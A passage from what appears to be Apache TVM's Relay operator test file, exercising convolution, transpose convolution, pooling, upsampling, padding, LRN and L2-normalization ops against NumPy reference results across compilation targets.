(n, h, w, 16), "int32")
def test_conv2d_run():
def run_test_conv2d(dtype, out_dtype, scale, dshape, kshape,
padding=(1, 1),
fref=None,
groups=1,
dilation=(1, 1),
except_targets=None,
**attrs):
if except_targets is None:
except_targets = []
x = relay.var("x", shape=dshape, dtype=dtype)
w = relay.var("w", dtype=dtype)
y = relay.nn.conv2d(x, w,
padding=padding,
dilation=dilation,
groups=groups,
**attrs)
func = relay.Function([x, w], y)
data = np.random.uniform(-scale, scale, size=dshape).astype(dtype)
kernel = np.random.uniform(-scale, scale, size=kshape).astype(dtype)
dkernel = topi.testing.dilate_python(kernel, (1, 1) + dilation)
if fref is None:
ref_res = topi.testing.conv2d_nchw_python(
data.astype(out_dtype), dkernel.astype(out_dtype), 1, padding,
groups=groups)
else:
ref_res = fref(data.astype(out_dtype), dkernel.astype(out_dtype))
for target, ctx in ctx_list():
if target in except_targets:
continue
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data, kernel)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
def compile_test_conv2d_arm_cpu(dtype, out_dtype, scale, dshape, kshape,
padding=(1, 1),
groups=1,
dilation=(1, 1),
**attrs):
x = relay.var("x", shape=dshape, dtype=dtype)
w = relay.var("w", dtype=dtype)
y = relay.nn.conv2d(x, w,
padding=padding,
dilation=dilation,
groups=groups,
**attrs)
func = relay.Function([x, w], y)
mod = tvm.relay.Module()
mod["main"] = func
test_schedule='{"i": ["llvm -device=arm_cpu", "topi_nn_depthwise_conv2d_nchw", \
[["TENSOR", [1, 512, 32, 32], "float32"], \
["TENSOR", [512, 1, 3, 3], "float32"], \
[1, 1], [1, 1], [1, 1], "float32"], {}, \
["depthwise_conv2d_nchw", [1, 512, 32, 32, "float32"], \
[512, 1, 3, 3, "float32"], [1, 1], [1, 1], [1, 1], "float32"], \
{"i": 743640, "t": "contrib_spatial_pack", "c": null, \
"e": [["tile_co", "sp", [32, 16]], ["tile_oh", "sp", [8, 1]], \
["tile_ow", "sp", [1, 8]], \
["reorder_0", "re", [0, 1, 2, 3, 4, 5, 8, 6, 7]], \
["reorder_1", "re", [0, 1, 2, 3, 6, 4, 5]], \
["ann_reduce", "an", ["unroll", "none"]], \
["ann_spatial", "an", ["unroll", "unroll", "vec"]], \
["data_pad_inline", "ot", 4], ["data_vec_inline", "ot", 1], \
["conv_inline", "ot", 0]]}], "r": [[0.0002933163], \
0, 3.1976189613342285, 1570811630.6058347], "v": 0.1}'
temp = util.tempdir()
with open(temp.relpath("temp.log"), "w") as log_file:
log_file.write(test_schedule)
with autotvm.apply_history_best(temp.relpath("temp.log")):
with relay.build_config(opt_level=3):
print('Compiling...')
graph_json, mod, params = tvm.relay.build(mod, target="llvm -device=arm_cpu")
# depthwise conv2d
dshape = (1, 32, 18, 18)
kshape = (32, 1, 3, 3)
run_test_conv2d("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=32, groups=32, kernel_size=(3 ,3),
fref=lambda x, w: topi.testing.depthwise_conv2d_python_nchw(
x, w, (1, 1), "SAME"))
# depthwise conv2d for arm_cpu
dshape = (1, 512, 32, 32)
kshape = (512, 1, 3, 3)
compile_test_conv2d_arm_cpu("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=512,
groups=512, kernel_size=(3 ,3))
# CUDA is disabled for 'direct' schedule:
# https://github.com/apache/incubator-tvm/pull/3070#issuecomment-486597553
# group conv2d
dshape = (1, 32, 18, 18)
kshape = (32, 4, 3, 3)
run_test_conv2d("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=32, groups=8, kernel_size=(3 ,3),
except_targets=['cuda'])
# also group conv2d
dshape = (1, 32, 18, 18)
kshape = (64, 1, 3, 3)
run_test_conv2d("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=64, groups=32, kernel_size=(3 ,3),
except_targets=['cuda'])
# normal conv2d
dshape = (1, 3, 224, 224)
kshape = (10, 3, 3, 3)
run_test_conv2d("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=10, kernel_size=(3 ,3))
# mixed precision
run_test_conv2d("int8", "int32", 1, dshape, kshape,
padding=(1, 1), channels=10, kernel_size=(3 ,3))
kshape = (10, 3, 1, 3)
# mixed precision.
run_test_conv2d("int8", "int32", 1, dshape, kshape,
padding=(0, 1), channels=10, kernel_size=(1 ,3))
# dilated conv2d
dshape = (1, 3, 18, 18)
kshape = (10, 3, 3, 3)
run_test_conv2d("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=10, kernel_size=(3 ,3), dilation=(3, 3))
def test_conv2d_winograd():
class WinogradFallback(autotvm.FallbackContext):
def _query_inside(self, target, workload):
key = (target, workload)
if key in self.memory:
return self.memory[key]
cfg = autotvm.task.space.FallbackConfigEntity()
cfg.template_key = 'winograd'
cfg.is_fallback = False
cfg['tile_b'] = autotvm.task.space.SplitEntity([-1, 1, 1, 1])
cfg['tile_y'] = autotvm.task.space.SplitEntity([-1, 1, 1, 1])
cfg['tile_x'] = autotvm.task.space.SplitEntity([-1, 1, 1, 1])
cfg['tile_rc'] = autotvm.task.space.SplitEntity([-1, 1])
cfg['auto_unroll_max_setp'] = autotvm.task.space.OtherOptionEntity(1500)
cfg['unroll_explicit'] = autotvm.task.space.OtherOptionEntity(1)
self.memory[key] = cfg
return cfg
def run_test_conv2d_cuda(dtype, out_dtype, scale, dshape, kshape,
padding=(1, 1),
groups=1,
dilation=(1, 1),
**attrs):
x = relay.var("x", shape=dshape, dtype=dtype)
w = relay.var("w", shape=kshape, dtype=dtype)
y = relay.nn.conv2d(x, w,
padding=padding,
dilation=dilation,
groups=groups,
**attrs)
func = relay.Function([x, w], y)
mod = relay.Module()
mod['main'] = func
mod = relay.transform.InferType()(mod)
data = np.random.uniform(-scale, scale, size=dshape).astype(dtype)
kernel = np.random.uniform(-scale, scale, size=kshape).astype(dtype)
ref_res = topi.testing.conv2d_nchw_python(
data.astype(out_dtype), kernel.astype(out_dtype), 1, padding,
groups=groups)
with WinogradFallback(), relay.build_config(opt_level=3):
for target, ctx in ctx_list():
if target != 'cuda':
continue
params = {'w': tvm.nd.array(kernel)}
graph, lib, params = relay.build_module.build(mod, target=target, params=params)
module = tvm.contrib.graph_runtime.create(graph, lib, ctx)
module.set_input('x', tvm.nd.array(data))
module.set_input(**params)
module.run()
op_res1 = module.get_output(0)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-3, atol=1e-3)
# normal winograd: stride 1, padding 1, kernel 3x3
dshape = (1, 80, 73, 73)
kshape = (192, 80, 3, 3)
run_test_conv2d_cuda("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=192, kernel_size=(3, 3))
# extended winograd: stride 1, padding N, kernel 3x3
run_test_conv2d_cuda("float32", "float32", 1, dshape, kshape,
padding=(0, 0), channels=192, kernel_size=(3, 3))
run_test_conv2d_cuda("float32", "float32", 1, dshape, kshape,
padding=(2, 2), channels=192, kernel_size=(3, 3))
# extended winograd: stride 1, padding N, kernel NxN
kshape = (192, 80, 7, 7)
run_test_conv2d_cuda("float32", "float32", 1, dshape, kshape,
padding=(2, 2), channels=192, kernel_size=(7, 7))
def test_conv3d_infer_type():
# symbolic in batch dimension
n, c, d, h, w = tvm.size_var("n"), 10, 224, 224, 224
x = relay.var("x", relay.ty.TensorType((n, c, d, h, w), "float32"))
w = relay.var("w")
y = relay.nn.conv3d(x, w,
kernel_size=(3, 3, 3),
padding=(1, 1, 1),
channels=2)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 224, 224, 224), "float32")
assert yy.args[1].checked_type == relay.TensorType(
(2, 10, 3, 3, 3), "float32")
# infer by shape of w, mixed precision
n, c, d, h, w = tvm.size_var("n"), 10, 224, 224, 224
x = relay.var("x", relay.TensorType((n, c, d, h, w), "int8"))
w = relay.var("w", relay.TensorType((2, 10, 3, 3, 3), "int8"))
y = relay.nn.conv3d(x, w, out_dtype="int32")
assert "out_dtype=\"int32\"" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 222, 222, 222), "int32")
# infer shape in case of different dtypes for input and weight.
n, c, d, h, w = tvm.size_var("n"), 10, 224, 224, 224
x = relay.var("x", relay.TensorType((n, c, d, h, w), "uint8"))
w = relay.var("w", relay.TensorType((2, 10, 3, 3, 3), "int8"))
y = relay.nn.conv3d(x, w, out_dtype="int32")
assert "out_dtype=\"int32\"" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 222, 222, 222), "int32")
# Infer with NDHWC
n, c, d, h, w = 4, 32, 224, 224, 224
x = relay.var("x", relay.TensorType((n, d, h, w, c), "int8"))
wt = relay.var("w")
y = relay.nn.conv3d(x, wt,
kernel_size=(3, 3, 3),
padding=(1, 1, 1),
channels=16,
data_layout="NDHWC",
out_dtype="int32")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, d, h, w, 16), "int32")
def test_conv3d_run():
def run_test_conv3d(dtype, out_dtype, scale, dshape, kshape,
padding=(1, 1, 1),
fref=None,
groups=1,
dilation=(1, 1, 1),
except_targets=None,
**attrs):
if except_targets is None:
except_targets = []
x = relay.var("x", shape=dshape, dtype=dtype)
w = relay.var("w", dtype=dtype)
y = relay.nn.conv3d(x, w,
padding=padding,
dilation=dilation,
groups=groups,
**attrs)
func = relay.Function([x, w], y)
data = np.random.uniform(-scale, scale, size=dshape).astype(dtype)
kernel = np.random.uniform(-scale, scale, size=kshape).astype(dtype)
dkernel = topi.testing.dilate_python(kernel, (1, 1) + dilation)
if fref is None:
ref_res = topi.testing.conv3d_ncdhw_python(
data.astype(out_dtype), dkernel.astype(out_dtype), 1, padding,
groups=groups)
else:
ref_res = fref(data.astype(out_dtype), dkernel.astype(out_dtype))
for target, ctx in ctx_list():
if target in except_targets:
continue
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data, kernel)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
# normal conv3d
dshape = (1, 3, 5, 224, 224)
kshape = (10, 3, 3, 3, 3)
run_test_conv3d("float32", "float32", 1, dshape, kshape,
padding=(1, 1, 1), channels=10, kernel_size=(3, 3 ,3))
def test_conv3d_ndhwc_run():
def run_test_conv3d(dtype, out_dtype, scale, dshape, kshape,
padding=(1, 1, 1),
fref=None,
groups=1,
dilation=(1, 1, 1),
except_targets=None,
**attrs):
if except_targets is None:
except_targets = []
x = relay.var("x", shape=dshape, dtype=dtype)
w = relay.var("w", dtype=dtype)
y = relay.nn.conv3d(x, w,
padding=padding,
dilation=dilation,
groups=groups,
data_layout="NDHWC", kernel_layout="DHWIO",
**attrs)
func = relay.Function([x, w], y)
data = np.random.uniform(-scale, scale, size=dshape).astype(dtype)
kernel = np.random.uniform(-scale, scale, size=kshape).astype(dtype)
dkernel = topi.testing.dilate_python(kernel, (1, 1) + dilation)
if fref is None:
ref_res = topi.testing.conv3d_ndhwc_python(
data.astype(out_dtype), dkernel.astype(out_dtype), 1, padding)
else:
ref_res = fref(data.astype(out_dtype), dkernel.astype(out_dtype))
for target, ctx in ctx_list():
if target in except_targets:
continue
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data, kernel)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
# normal conv3d
dshape = (1, 5, 224, 224, 6)
kshape = (3, 3, 3, 6, 10)
run_test_conv3d("float32", "float32", 1, dshape, kshape,
padding=(1, 1, 1), channels=10, kernel_size=(3, 3 ,3), except_targets=["cuda"])
def test_conv2d_transpose_infer_type():
# symbolic in batch dimension
n, c, h, w = tvm.size_var("n"), 10, 10, 12
x = relay.var("x", relay.TensorType((n, c, h, w), "float32"))
w = relay.var("w", relay.IncompleteType())
y = relay.nn.conv2d_transpose(x, w,
kernel_size=(3, 3),
padding=(1, 1),
channels=15)
assert "channels=15" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 15, 10, 12), "float32")
assert yy.args[1].checked_type == relay.TensorType(
(10, 15, 3, 3), "float32")
# infer by shape of w, mixed precision
n, h, w, c = tvm.size_var("n"), 10, 10, 12
x = relay.var("x", relay.TensorType((n, h, w, c), "float32"))
w = relay.var("w", relay.TensorType((12, 11, 5, 5), "float32"))
y = relay.nn.conv2d_transpose(x, w,
output_padding=(1, 1),
channels=11,
data_layout="NHWC")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 15, 15, 11), "float32")
def test_conv2d_transpose_nchw_run():
dshape = (1, 3, 18, 18)
kshape = (3, 10, 3, 3)
oshape = (1, 10, 37, 37)
x = relay.var("x", shape=dshape)
w = relay.var("w")
y = relay.nn.conv2d_transpose(x, w,
channels=10, kernel_size=(3,3), strides=(2,2),
padding=(1,1), output_padding=(2, 2))
func = relay.Function([x, w], y)
dtype = "float32"
data = np.random.uniform(size=dshape).astype(dtype)
kernel = np.random.uniform(size=kshape).astype(dtype)
c_np = topi.testing.conv2d_transpose_nchw_python(
data, kernel, 2, 1)
d_np = np.zeros(shape=oshape)
d_np[:,:,0:c_np.shape[2],0:c_np.shape[3]] = c_np
ref_res = d_np
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data, kernel)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
def test_conv2d_transpose_nhwc_run():
dshape_nhwc = (1, 18, 18, 3)
kshape_hwoi = (3, 3, 10, 3)
oshape_nhwc = (1, 37, 37, 10)
x = relay.var("x", shape=dshape_nhwc)
w = relay.var("w")
# kshape and kernel_layout should have swapped IO.
# kshape is HWOI and kernel_layout is HWIO
y = relay.nn.conv2d_transpose(x, w,
channels=10, kernel_size=(3, 3), strides=(2, 2),
padding=(1, 1), output_padding=(2, 2),
data_layout="NHWC", kernel_layout="HWIO")
func = relay.Function([x, w], y)
dtype = "float32"
data = np.random.uniform(size=dshape_nhwc).astype(dtype)
kernel = np.random.uniform(size=kshape_hwoi).astype(dtype)
# use true kshape layout here - HWOI
c_np = topi.testing.conv2d_transpose_nhwc_python(data, kernel, 'HWOI', 2, 1)
d_np = np.zeros(shape=oshape_nhwc)
d_np[:,0:c_np.shape[1],0:c_np.shape[2],:] = c_np
def test_conv1d_transpose_ncw_run():
dshape = (1, 3, 18)
kshape = (3, 10, 3)
oshape = (1, 10, 37)
x = relay.var("x", shape=dshape)
w = relay.var("w")
y = relay.nn.conv1d_transpose(x, w,
channels=10, kernel_size=(3,), strides=(2,),
padding=(1,), output_padding=(2,))
func = relay.Function([x, w], y)
dtype = "float32"
data = np.random.uniform(size=dshape).astype(dtype)
kernel = np.random.uniform(size=kshape).astype(dtype)
c_np = topi.testing.conv1d_transpose_ncw_python(
data, kernel, 2, 1)
d_np = np.zeros(shape=oshape)
d_np[:,:,0:c_np.shape[2]] = c_np
ref_res = d_np
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data, kernel)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
def test_upsampling_infer_type():
n, c , h, w = tvm.size_var("n"), tvm.size_var("c"), tvm.size_var("h"), tvm.size_var("w")
scale = tvm.const(2.0, "float64")
x = relay.var("x", relay.TensorType((n, c, h, w), "float32"))
y = relay.nn.upsampling(x, scale_h=2, scale_w=2, layout="NCHW", method="bilinear")
"method=\"BINLINEAR\"" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, c, tvm.expr.Cast("int32", tvm.round(h*scale)),
tvm.expr.Cast("int32", tvm.round(w*scale))),
"float32")
n, c = tvm.size_var("n"), tvm.size_var("c")
x = relay.var("x", relay.TensorType((n, c, 100, 200), "float32"))
y = relay.nn.upsampling(x, scale_h=2, scale_w=2, layout="NCHW", method="bilinear")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, c, 200, 400), "float32")
def test_upsampling3d_infer_type():
n, c, d, h, w = tvm.size_var("n"), tvm.size_var("c"),\
tvm.size_var("d"), tvm.size_var("h"), tvm.size_var("w")
scale = tvm.const(2.0, "float64")
x = relay.var("x", relay.TensorType((n, c, d, h, w), "float32"))
y = relay.nn.upsampling3d(x, scale_d=2, scale_h=2, scale_w=2, layout="NCDHW", method="trilinear")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, c, tvm.expr.Cast("int32", tvm.round(d*scale)),
tvm.expr.Cast("int32", tvm.round(h*scale)),
tvm.expr.Cast("int32", tvm.round(w*scale))),
"float32")
n, c = tvm.size_var("n"), tvm.size_var("c")
x = relay.var("x", relay.TensorType((n, c, 100, 100, 200), "float32"))
y = relay.nn.upsampling3d(x, scale_d=2, scale_h=2, scale_w=2, layout="NCDHW", method="trilinear")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, c, 200, 200, 400), "float32")
def _test_pool2d(opfunc, reffunc):
n, c, h, w = tvm.size_var("n"), 10, 224, 224
x = relay.var("x", relay.TensorType((n, c, h, w), "float32"))
y = opfunc(x, pool_size=(1, 1))
assert "pool_size=" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, 10, 224, 224), "float32")
# test execution
dtype = "float32"
dshape = (1, 3, 28, 28)
x = relay.var("x", shape=dshape)
y = opfunc(x, pool_size=(2, 2), strides=(2, 2), padding=(0, 0))
func = relay.Function([x], y)
data = np.random.uniform(size=dshape).astype(dtype)
ref_res = reffunc(data.reshape(1, 3, 14, 2, 14, 2), axis=(3, 5))
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
def _test_pool2d_int(opfunc, reffunc, dtype):
n, c, h, w = tvm.size_var("n"), 10, 224, 224
x = relay.var("x", relay.TensorType((n, c, h, w), dtype))
y = opfunc(x, pool_size=(1, 1))
assert "pool_size=" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, 10, 224, 224), dtype)
# test execution
dtype = "int32"
dshape = (1, 3, 28, 28)
x = relay.var("x", shape=dshape, dtype=dtype)
y = opfunc(x, pool_size=(2, 2), strides=(2, 2), padding=(0, 0))
func = relay.Function([x], y)
data = np.random.random_integers(low=-128, high=128, size=dshape)
ref_res = reffunc(data.reshape(1,3,14,2,14,2), axis=(3,5)).astype(dtype)
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
def _test_global_pool2d(opfunc, reffunc):
n, c, h, w = tvm.size_var("n"), tvm.size_var("c"), 224, 224
x = relay.var("x", relay.TensorType((n, h, w, c), "float32"))
y = opfunc(x, layout="NHWC")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, 1, 1, c), "float32")
n, c, h, w = tvm.size_var("n"), tvm.size_var("c"), tvm.size_var("h"), tvm.size_var("w")
x = relay.var("x", relay.TensorType((n, c, h, w), "float32"))
y = opfunc(x)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, c, 1, 1), "float32")
# test execution
dtype = "float32"
dshape = (1, 1024, 7, 7)
x = relay.var("x", shape=dshape)
y = opfunc(x)
func = relay.Function([x], y)
data = np.random.uniform(size=dshape).astype(dtype)
ref_res = reffunc(data, axis=(2,3), keepdims=True)
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
def test_pool2d():
_test_pool2d(relay.nn.max_pool2d, np.max)
_test_pool2d(relay.nn.avg_pool2d, np.mean)
_test_pool2d_int(relay.nn.avg_pool2d, np.mean, 'int32')
_test_pool2d_int(relay.nn.avg_pool2d, np.mean, 'uint16')
_test_global_pool2d(relay.nn.global_max_pool2d, np.max)
_test_global_pool2d(relay.nn.global_avg_pool2d, np.mean)
def test_pool1d():
def _test_pool1d(opfunc):
n, c, w = tvm.var("n"), 10, 224
x = relay.var("x", relay.TensorType((n, c, w), "float32"))
y = opfunc(x, pool_size=(1,))
assert "pool_size=" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, 10, 224), "float32")
# test execution
dtype = "float32"
dshape = (1, 3, 32)
x = relay.var("x", shape=dshape)
pool_type = 'max' if 'max' in str(opfunc) else 'avg'
y = opfunc(x, pool_size=(2,), strides=(2,), padding=(0, 0))
func = relay.Function([x], y)
data = np.random.uniform(size=dshape).astype(dtype)
ref_res = topi.testing.pool1d_ncw_python(data, (2,), (2,),
(0, 0), (1, 3, 16), pool_type, False)
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
_test_pool1d(relay.nn.max_pool1d)
_test_pool1d(relay.nn.avg_pool1d)
def test_pool3d():
def _test_pool3d(opfunc, padding=(0, 0, 0, 0, 0, 0), out_shape=(1, 3, 16, 16, 16)):
n, c, d, h, w = tvm.size_var("n"), 10, 5, 224, 224
x = relay.var("x", relay.TensorType((n, c, d, h, w), "float32"))
y = opfunc(x, pool_size=(1, 1, 1))
assert "pool_size=" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, 10, 5, 224, 224), "float32")
# test execution
dtype = "float32"
dshape = (1, 3, 32, 32, 32)
x = relay.var("x", shape=dshape)
pool_type = 'max' if 'max' in str(opfunc) else 'avg'
y = opfunc(x, pool_size=(2, 2, 2), strides=(2, 2, 2), padding=padding)
func = relay.Function([x], y)
# check output shape
f_out_shape = tuple(map(lambda x: int(x), run_infer_type(func).ret_type.shape))
assert out_shape == f_out_shape, \
"Output shape mismatch. expected {}, actual {}".format(out_shape, f_out_shape)
data = np.random.uniform(size=dshape).astype(dtype)
ref_res = topi.testing.pool3d_ncdhw_python(data, (2, 2, 2), (2, 2, 2),
padding, out_shape, pool_type, False)
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
_test_pool3d(relay.nn.max_pool3d)
_test_pool3d(relay.nn.max_pool3d, padding=(2, 0, 0, 2, 0, 0), out_shape=(1, 3, 18, 16, 16))
_test_pool3d(relay.nn.max_pool3d, padding=(0, 3, 0, 0, 3, 0), out_shape=(1, 3, 16, 19, 16))
_test_pool3d(relay.nn.max_pool3d, padding=(0, 0, 4, 0, 0, 4), out_shape=(1, 3, 16, 16, 20))
_test_pool3d(relay.nn.avg_pool3d)
_test_pool3d(relay.nn.avg_pool3d, padding=(2, 0, 0, 2, 0, 0), out_shape=(1, 3, 18, 16, 16))
_test_pool3d(relay.nn.avg_pool3d, padding=(0, 3, 0, 0, 3, 0), out_shape=(1, 3, 16, 19, 16))
_test_pool3d(relay.nn.avg_pool3d, padding=(0, 0, 4, 0, 0, 4), out_shape=(1, 3, 16, 16, 20))
def test_avg_pool2d_no_count_pad():
kh, kw = (4, 4)
sh, sw = (2, 2)
ph, pw = (2, 2)
n = 1
(ic, ih, iw) = (3, 28, 28)
(oc, oh, ow) = (3, 15, 15)
dshape = (n, ic, ih, iw)
x = relay.var("x", shape=dshape)
y = relay.nn.avg_pool2d(x,
pool_size=(kh, kw),
strides=(sw, sw),
padding=(ph, pw),
count_include_pad=False)
func = relay.Function([x], y)
dtype = "float32"
a_np = np.random.uniform(low=0.001, size=(n, ic, ih, iw)).astype(dtype)
pad_np = np.zeros(shape=(n, ic, ih+2*ph, iw+2*pw)).astype(dtype)
no_zero = (range(n), range(ic), (range(ph, ih+ph)), (range(pw, iw+pw)))
pad_np[np.ix_(*no_zero)] = a_np
b_np = np.zeros(shape=(n, oc, oh, ow)).astype(dtype)
for i in range(oh):
for j in range(ow):
pad_count = np.sum(pad_np[:, :, i*sh:i*sh+kh, j*sw:j*sw+kw] > 0, axis=(2,3))
b_np[:,:,i,j] = np.sum(pad_np[:, :, i*sh:i*sh+kh, j*sw:j*sw+kw],
axis=(2,3)) / np.maximum(pad_count, 1)
ref_res = np.maximum(b_np, 0.0)
data = a_np
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
def test_flatten_infer_type():
d1, d2, d3, d4 = tvm.size_var("d1"), tvm.size_var("d2"), tvm.size_var("d3"), tvm.size_var("d4")
x = relay.var("x", relay.TensorType((d1, d2, d3, d4), "float32"))
y = relay.nn.batch_flatten(x)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((d1, ((d2*d3)*d4)), "float32")
x = relay.var("x", relay.TensorType((3, 2, 4, 3), "float32"))
y = relay.nn.batch_flatten(x)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((3, 24), "float32")
x = relay.var("x", relay.TensorType((d1, 2, d3, 3), "float32"))
y = relay.nn.batch_flatten(x)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((d1, ((2*d3)*3)), "float32")
shape = (1, 5, 10, 10)
o_shape = (1, 500)
dtype = "float32"
x = relay.var("x", relay.TensorType(shape, dtype))
z = relay.nn.batch_flatten(x)
yy = run_infer_type(z)
assert yy.checked_type == relay.TensorType(o_shape, dtype)
func = relay.Function([x], z)
x_data = np.random.uniform(low=-1, high=1, size=shape).astype(dtype)
ref_res = x_data.flatten().reshape(o_shape)
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
intrp2 = relay.create_executor("debug", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5)
op_res2 = intrp2.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res2.asnumpy(), ref_res, rtol=1e-5)
def test_pad_infer_type():
# entirely concrete case
n, c, h, w = 1, 2, 3, 4
t = relay.var("t", relay.TensorType((n, c, h, w), "float32"))
y = relay.nn.pad(t, ((1, 1), (2, 2), (3, 3), (4, 4)))
"pad_width=" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((3, 6, 9, 12), "float32")
# some symbolic values
n, c, h, w = tvm.size_var("n"), 2, 3, tvm.size_var("w")
t = relay.var("t", relay.TensorType((n, c, h, w), "float32"))
y = relay.nn.pad(t, ((1, 1), (2, 2), (3, 3), (4, 4)))
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n + 2, 6, 9, w + 8), "float32")
def test_pad_run():
def _test_run(dtype):
dshape = (4, 10, 7, 7)
x = relay.var("x", shape=dshape)
y = relay.nn.pad(x, ((1, 1), (2, 2), (3, 3), (4, 4)))
func = relay.Function([x], y)
data = np.random.uniform(size=dshape).astype(dtype)
ref_res = np.pad(data, ((1, 1), (2, 2), (3, 3), (4, 4)), 'constant')
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
_test_run('float32')
_test_run('int32')
def test_lrn():
n, c , h, w = tvm.size_var("n"), tvm.size_var("c"), tvm.size_var("h"), tvm.size_var("w")
x = relay.var("x", shape=(n, c , h, w))
y = relay.nn.lrn(x, size=10, axis=2, bias=0.5, alpha=.00001, beta=0.75)
"alpha=" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, c , h, w))
shape = (1, 5, 10, 10)
dtype = "float32"
x = relay.var("x", relay.TensorType(shape, dtype))
size=5
axis=1
bias=0.5
alpha=.00001
beta=0.75
z = relay.nn.lrn(x, size=size, axis=axis, bias=bias, alpha=alpha, beta=beta)
yy = run_infer_type(z)
assert yy.checked_type == relay.TensorType(shape, dtype)
func = relay.Function([x], z)
x_data = np.random.uniform(low=-1, high=1, size=shape).astype(dtype)
ref_res = topi.testing.lrn_python(x_data, size, axis, bias, alpha, beta)
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
intrp2 = relay.create_executor("debug", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5)
op_res2 = intrp2.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res2.asnumpy(), ref_res, rtol=1e-5)
def test_l2_normalize():
n, c , h, w = tvm.size_var("n"), tvm.size_var("c"), tvm.size_var("h"), tvm.size_var("w")
x = relay.var("x", shape=(n, c , h, w))
y = relay.nn.l2_normalize(x, eps=0.001, axis=[1])
"axis=" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, c , h, w))
shape = (1, 5, 10, 10)
dtype = "float32"
x = relay.var("x", relay.TensorType(shape, dtype))
eps=0.001
axis=1
z = relay.nn.l2_normalize(x, eps=0.001, axis=[axis])
yy = run_infer_type(z)
assert yy.checked_type == relay.TensorType(shape, dtype)
func = relay.Function([x], z)
x_data = np.random.uniform(low=-1, high=1, size=shape).astype(dtype)
ref_res = topi.testing.l2_normalize_python(x_data, eps, axis)
